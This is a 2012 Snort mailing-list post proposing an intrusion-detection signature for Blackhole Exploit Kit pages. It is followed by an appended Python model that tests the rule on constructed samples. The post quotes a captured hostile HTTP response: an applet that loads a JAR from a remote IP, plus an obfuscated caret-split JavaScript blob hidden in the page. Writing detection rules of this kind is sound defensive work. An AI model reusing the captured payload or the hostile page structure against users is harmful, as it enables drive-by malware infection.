Snort mailing list archives

Proposed Signature - COMMUNITY SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with hostile applet


From: Community Proposed <lists () packetmail net>
Date: Tue, 21 Feb 2012 13:16:17 -0600

12:08:49.734573 IP 65.75.137.95.80 > a.b.c.d.3586: . 1:1461(1460) ack 567 win 6792
HTTP/1.1 200 OK
Date: Tue, 21 Feb 2012 19:30:23 GMT
Server: nginx/0.7.65
Content-Type: text/html
X-Powered-By: PHP/5.3.2
Connection: close
Transfer-Encoding: chunked

4ef
<html><body><applet code='Photo.class'
archive='http://65.75.137.95/content/jav.jar'><param
value="&#118;ssMlgg=9Po9Pd%oP/9gOFU6gYPMvM-Vcd=G6cr" name="p"/></applet><div
style="display:none;"><p>@wpg9p@^p^@pg^p@9pgwp^4p4p^^p^2pg3p^4p@9p-2p-3pzwp@^p@9pgwp^4p@9p^2p20pzwpg2p^p20p3wpggp@9p@@p^3p@9p-z0p^^p@@pg3p^4p-z0p^0p@@pgzp@9p-z0pg3p^3p-z0pggpg9p@@p@wpg3pgwpgzp4p4p4pzwp@pg2p^p20pzwp@p@^p@9pgwp^4p@9p^2p20pzwpg2p^2p20p-3p-zpz^pg0p^@pgwp@^p^4pg3pg9pgwp-z0p@9pgwp@wp@3p^2p@9p@wpg3p^2p@9p@^p^4p-2p-zpwzpw3p^gp@@p^2p-z0p^0p@wpg0p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zp2pg0pggp@@p^3pg2p^gp@9p^2pz9p49pgp2pgp2pgp2pgp@zpz^p^4p^2p^9pwzp^gp@@p^2p-z0p3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4pz9pwzp^gp@9p^2p^3pg3pg9pgwpzgp-wpgp4pz3p4pz2p-wp2pgwp@@pg^p@9pzgp-wp3wpggp^@pgzpg3pgwp2gp@9p^4p@9p@^p^4p-wp2pg2p@@pgwp@wpggp@9p^2pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@^p2p@gp2p@@p-zpwzp^2p@9p^4p^@p^2pgwp-z0pg0p^@pgwp@^p^4pg3pg9pgwp-2p-zpwzp@^p-2p@gp2p@@p-zpw3pw3p2pg3p^3p2gp@9pg0pg3pgwp@9p@wpzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-z0p^4p^9p^0p@9pg9pg0p-z0p@gp-9pz9p-wp^@pgwp@wp@9pg0pg3pgwp@9p@wp-wpw3p2pg3p^3p23p^2p^2p@@p^9pzgpg0p^@pgwp@^p^4pg3pg9pgwp-2p@gp-zpwzp^2p@9p^4p^@p^2pgwp-2p
 @p@@p^2p^2p@@p^9p@pg3p-zp4p^4p@9p^3p^4p-2p3^p@gpg4p@9p@^p^4p4p^0p^2pg9p^4pg9p^4p^9p^0p@9p4p^4pg9
333

# distance:0 resumes right after the end of the previous match, so the first
# content must not consume the space that the following |20|code= has to match.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY
SPECIFIC-THREATS Blackhole Exploit Kit JavaScript carat string splitting with
hostile applet"; flow:established,from_server;
content:"<html><body><applet"; fast_pattern; content:"|20|code=";
distance:0; content:"|20|archive="; distance:0; content:"|3a|none|3b|";
distance:0; nocase; pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi";
classtype:trojan-activity;
reference:url,community.websense.com/blogs/securitylabs/pages/black-hole-exploit-kit.aspx;
sid:x; rev:1;)

Thanks,
Nathan
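An added Python model of the proposed rule's matching logic, run over constructed samples; this is not code from the post or from Snort. It assumes that Snort's distance:0 resumes searching immediately after the previous content match (so the first content is kept without its trailing space), and the host, param value and caret-split blob in the samples are placeholders built here.

```python
import re

# The rule's relative content matches, in order. Snort's distance:0 resumes
# right after the previous match, so the first pattern is kept WITHOUT the
# trailing 0x20 of "<applet|20|": had it consumed the space, " code=" could
# never match the single space seen in the capture. Only ":none;" has nocase.
CONTENTS = [(b"<html><body><applet", False), (b" code=", False),
            (b" archive=", False), (b":none;", True)]

# pcre:"/([@\x2da-z0-9]*?\x5e){50,}/Oi": 50 or more tokens made of '@', '-',
# letters and digits, each ended by a caret (0x5e). /i becomes re.IGNORECASE;
# /O (PCRE match-limit override) has no equivalent here and is not needed.
TOKEN = rb"[@\x2da-z0-9]*?\x5e"
CARAT_SPLIT = re.compile(b"(" + TOKEN + b"){50,}", re.IGNORECASE)


def ordered_contents_match(payload: bytes) -> bool:
    """Emulate the chain of content/distance:0 checks."""
    pos = 0
    for needle, nocase in CONTENTS:
        hay = payload[pos:]
        idx = hay.lower().find(needle.lower()) if nocase else hay.find(needle)
        if idx < 0:
            return False
        pos += idx + len(needle)
    return True


def longest_carat_run(payload: bytes) -> int:
    """Longest run of consecutive caret-terminated tokens (for tuning {50,})."""
    runs = re.finditer(b"(?:" + TOKEN + b")+", payload, re.IGNORECASE)
    return max((m.group(0).count(b"^") for m in runs), default=0)


def rule_fires(payload: bytes) -> bool:
    # The pcre carries no R modifier, so it is searched over the whole payload.
    return ordered_contents_match(payload) and bool(CARAT_SPLIT.search(payload))


# Constructed samples, not the capture itself: HOSTILE mirrors the applet markup
# and hidden <p> blob with a placeholder host and 60 caret-separated tokens;
# BENIGN is an ordinary applet page with a hidden div and only two carets.
_BLOB = "^".join(f"@{i % 10}pg{i % 7}" for i in range(60)).encode() + b"^"
HOSTILE = (b"<html><body><applet code='Photo.class' "
           b"archive='http://applet.invalid/content/jav.jar'>"
           b"<param value=\"ssMlgg=9Po9Pd\" name=\"p\"/></applet>"
           b"<div style=\"display:NONE;\"><p>" + _BLOB + b"</p></div></body></html>")
BENIGN = (b"<html><body><applet code='Clock.class' archive='clock.jar'>"
          b"</applet><div style='display:none;'><p>a^b^c</p></div></body></html>")

if __name__ == "__main__":
    for name, body in (("hostile", HOSTILE), ("benign", BENIGN)):
        print(f"{name}: fires={rule_fires(body)} run={longest_carat_run(body)}")
```

The benign page passes every content check and is rejected only by the pcre, which is why the caret-run threshold, not the applet markup, carries the rule's precision.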

